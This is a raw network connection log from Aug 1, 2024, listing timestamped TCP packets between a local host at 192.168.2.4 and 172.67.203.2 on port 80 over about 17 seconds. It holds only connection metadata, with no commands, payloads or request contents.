                                                  Aug 1, 2024 07:38:27.070417881 CEST8049820172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:27.070616961 CEST8049821172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:27.070677042 CEST4982080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.070713043 CEST4982180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.070815086 CEST4982180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.075659037 CEST8049821172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:27.427742958 CEST4982180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.432701111 CEST8049821172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:27.524148941 CEST8049821172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:27.615166903 CEST4982180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.768132925 CEST8049821172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:27.818300009 CEST4982180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.952964067 CEST4982180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.953449011 CEST4982280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.958396912 CEST8049822172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:27.958442926 CEST8049821172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:27.958506107 CEST4982280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.958537102 CEST4982180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.958657026 CEST4982280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:27.963542938 CEST8049822172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:28.319014072 CEST4982280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:28.324574947 CEST8049822172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:28.412509918 CEST8049822172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:28.505810022 CEST4982280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:28.651263952 CEST8049822172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:28.695326090 CEST4982380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:28.700459957 CEST8049823172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:28.700562954 CEST4982380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:28.700658083 CEST4982380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:28.705584049 CEST8049823172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:28.806346893 CEST4982480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:28.811928034 CEST8049824172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:28.812004089 CEST4982480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:28.812093973 CEST4982480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:28.817596912 CEST8049824172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:28.818356037 CEST4982280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.052886009 CEST4982380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.058886051 CEST8049823172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.058917999 CEST8049823172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.156270981 CEST8049823172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.162136078 CEST4982480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.167774916 CEST8049824172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.240201950 CEST4982380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.259375095 CEST8049824172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.405386925 CEST8049823172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.417229891 CEST8049824172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.417301893 CEST4982480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.532975912 CEST4982480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.533023119 CEST4982380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.533236027 CEST4982280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.533759117 CEST4982580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.538223982 CEST8049824172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.538299084 CEST4982480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.538623095 CEST8049825172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.538719893 CEST8049823172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.538811922 CEST4982380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.538825035 CEST4982580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.538949966 CEST4982580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.539175987 CEST8049822172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.539253950 CEST4982280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.544044018 CEST8049825172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:29.896848917 CEST4982580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:29.901819944 CEST8049825172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:30.008982897 CEST8049825172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:30.115180016 CEST4982580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:30.161134005 CEST8049825172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:30.302692890 CEST4982580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:30.304620981 CEST4982580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:30.305458069 CEST4982680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:30.310944080 CEST8049825172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:30.310986996 CEST8049826172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:30.311006069 CEST4982580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:30.311058998 CEST4982680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:30.311141014 CEST4982680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:30.315939903 CEST8049826172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:30.679275036 CEST4982680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:30.685053110 CEST8049826172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:30.782387018 CEST8049826172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:30.912041903 CEST4982680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.038536072 CEST8049826172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.115171909 CEST4982680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.130588055 CEST8049826172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.252357006 CEST4982680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.252805948 CEST4982780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.257837057 CEST8049827172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.257904053 CEST4982780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.257999897 CEST4982780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.258083105 CEST8049826172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.258142948 CEST4982680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.263081074 CEST8049827172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.615725994 CEST4982780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.620903969 CEST8049827172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.703639030 CEST8049827172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.918080091 CEST8049827172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.918145895 CEST4982780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:31.940352917 CEST8049827172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:31.940465927 CEST4982780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.067660093 CEST4982780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.068972111 CEST4982880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.073745012 CEST8049827172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:32.073859930 CEST4982780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.074825048 CEST8049828172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:32.074901104 CEST4982880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.075002909 CEST4982880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.080245972 CEST8049828172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:32.428235054 CEST4982880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.433914900 CEST8049828172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:32.531980038 CEST8049828172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:32.615216017 CEST4982880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.773020983 CEST8049828172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:32.895327091 CEST4982880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.896119118 CEST4982980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.900784969 CEST8049828172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:32.900861025 CEST4982880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.901209116 CEST8049829172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:32.901278973 CEST4982980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.901392937 CEST4982980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:32.906800985 CEST8049829172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:33.256136894 CEST4982980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:33.261209011 CEST8049829172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:33.354757071 CEST8049829172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:33.396440029 CEST4982980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:33.614284992 CEST8049829172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:33.662045002 CEST4982980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:33.753895998 CEST4982980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:33.754594088 CEST4983080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:33.759608030 CEST8049830172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:33.759707928 CEST4983080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:33.759836912 CEST4983080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:33.765043974 CEST8049830172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:33.768043041 CEST8049829172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:33.768121004 CEST4982980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.115406036 CEST4983080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.120585918 CEST8049830172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.244972944 CEST8049830172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.287050009 CEST4983080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.413470030 CEST4983180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.413635015 CEST4983080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.418643951 CEST8049831172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.418754101 CEST4983180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.418827057 CEST4983180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.419214964 CEST8049830172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.419275045 CEST4983080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.423600912 CEST8049831172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.536982059 CEST4983280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.541949034 CEST8049832172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.544307947 CEST4983280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.544436932 CEST4983280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.549272060 CEST8049832172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.772032976 CEST4983180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.777164936 CEST8049831172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.777182102 CEST8049831172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.861565113 CEST8049831172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.896852970 CEST4983280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.901693106 CEST8049832172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:34.912039042 CEST4983180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:34.989065886 CEST8049832172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.037059069 CEST4983280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.057178974 CEST8049831172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.115197897 CEST4983180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.152575016 CEST8049832172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.193295956 CEST4983280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.272984982 CEST4983180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.273061037 CEST4983280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.273756981 CEST4983380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.278273106 CEST8049831172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.278341055 CEST4983180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.278692007 CEST8049832172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.278724909 CEST8049833172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.278742075 CEST4983280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.278812885 CEST4983380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.278922081 CEST4983380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.284172058 CEST8049833172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.631474972 CEST4983380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.636744022 CEST8049833172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.733030081 CEST8049833172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:35.912049055 CEST4983380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:35.975475073 CEST8049833172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.102282047 CEST4983380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.102987051 CEST4983480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.107748032 CEST8049833172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.107800961 CEST8049834172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.107832909 CEST4983380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.107887030 CEST4983480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.107959986 CEST4983480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.112750053 CEST8049834172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.458986998 CEST4983480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.464251995 CEST8049834172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.561866045 CEST8049834172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.615200043 CEST4983480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.803786993 CEST8049834172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.912049055 CEST4983480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.927203894 CEST4983480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.927405119 CEST4983580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.932427883 CEST8049835172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.932831049 CEST8049834172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:36.932919979 CEST4983480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.932940960 CEST4983580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.933092117 CEST4983580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:36.938139915 CEST8049835172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:37.287194967 CEST4983580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:37.292268038 CEST8049835172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:37.378962994 CEST8049835172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:37.427675962 CEST4983580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:37.549602985 CEST8049835172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:37.599555016 CEST4983580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:37.676390886 CEST4983580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:37.677375078 CEST4983680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:37.681931019 CEST8049835172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:37.682023048 CEST4983580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:37.683444977 CEST8049836172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:37.683510065 CEST4983680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:37.683608055 CEST4983680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:37.688441038 CEST8049836172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:38.040499926 CEST4983680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:38.050127029 CEST8049836172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:38.163320065 CEST8049836172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:38.302719116 CEST4983680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:38.399863005 CEST8049836172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:38.525238037 CEST4983680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:38.526098967 CEST4983780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:38.530639887 CEST8049836172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:38.530816078 CEST4983680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:38.531167984 CEST8049837172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:38.531256914 CEST4983780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:38.531377077 CEST4983780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:38.536353111 CEST8049837172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:38.881041050 CEST4983780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:38.886900902 CEST8049837172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:38.984688044 CEST8049837172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:39.037055016 CEST4983780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.217135906 CEST8049837172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:39.271594048 CEST4983780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.347085953 CEST4983780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.347500086 CEST4983880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.352399111 CEST8049837172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:39.352786064 CEST8049838172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:39.352843046 CEST4983780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.352879047 CEST4983880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.352999926 CEST4983880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.358011007 CEST8049838172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:39.709064960 CEST4983880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.714190006 CEST8049838172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:39.819072008 CEST8049838172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:39.865238905 CEST4983880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:39.970844030 CEST8049838172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.021437883 CEST4983880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.071777105 CEST4983880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.072240114 CEST4983980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.077073097 CEST8049838172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.077208996 CEST8049839172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.077291012 CEST4983880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.077395916 CEST4983980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.077512980 CEST4983980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.082298994 CEST8049839172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.095804930 CEST4983980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.096839905 CEST4984080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.101788044 CEST8049840172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.106503010 CEST4984080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.106586933 CEST4984080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.111387014 CEST8049840172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.141901016 CEST8049839172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.455702066 CEST8049839172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.455931902 CEST4983980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.459127903 CEST4984080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.464016914 CEST8049840172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.579710960 CEST8049840172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.630789042 CEST4984080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.828578949 CEST8049840172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.880795002 CEST4984080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.979968071 CEST4984080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.980907917 CEST4984180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.985207081 CEST8049840172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.985263109 CEST4984080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.985840082 CEST8049841172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:40.985914946 CEST4984180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.986021042 CEST4984180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:40.990813971 CEST8049841172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:41.334069014 CEST4984180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:41.340749025 CEST8049841172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:41.448802948 CEST8049841172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:41.490164042 CEST4984180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:41.698100090 CEST8049841172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:41.740180016 CEST4984180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:41.823502064 CEST4984280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:41.828561068 CEST8049842172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:41.828641891 CEST4984280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:41.828728914 CEST4984280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:41.833463907 CEST8049842172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:42.177973986 CEST4984280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.182979107 CEST8049842172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:42.285811901 CEST8049842172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:42.333991051 CEST4984280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.436835051 CEST8049842172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:42.490236998 CEST4984280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.567910910 CEST4984280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.573513031 CEST8049842172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:42.577543974 CEST4984280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.589715958 CEST4984380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.594645977 CEST8049843172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:42.595431089 CEST4984380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.595539093 CEST4984380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.601219893 CEST8049843172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:42.943382025 CEST4984380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:42.948287964 CEST8049843172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.298593998 CEST8049843172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.300574064 CEST8049843172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.300638914 CEST4984380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:43.325967073 CEST8049843172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.326035023 CEST4984380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:43.446158886 CEST4984380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:43.447053909 CEST4984480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:43.451553106 CEST8049843172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.451739073 CEST4984380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:43.451967001 CEST8049844172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.452068090 CEST4984480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:43.452290058 CEST4984480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:43.457175016 CEST8049844172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.802771091 CEST4984480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:43.807837963 CEST8049844172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.896549940 CEST8049844172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:43.943397999 CEST4984480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:44.137574911 CEST8049844172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:44.177685976 CEST4984480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:44.251446962 CEST4984480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:44.252759933 CEST4984580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:44.256845951 CEST8049844172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:44.256921053 CEST4984480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:44.257590055 CEST8049845172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:44.257658005 CEST4984580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:44.257770061 CEST4984580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:38:44.262492895 CEST8049845172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:38:44.615314007 CEST4984580192.168.2.4172.67.203.2
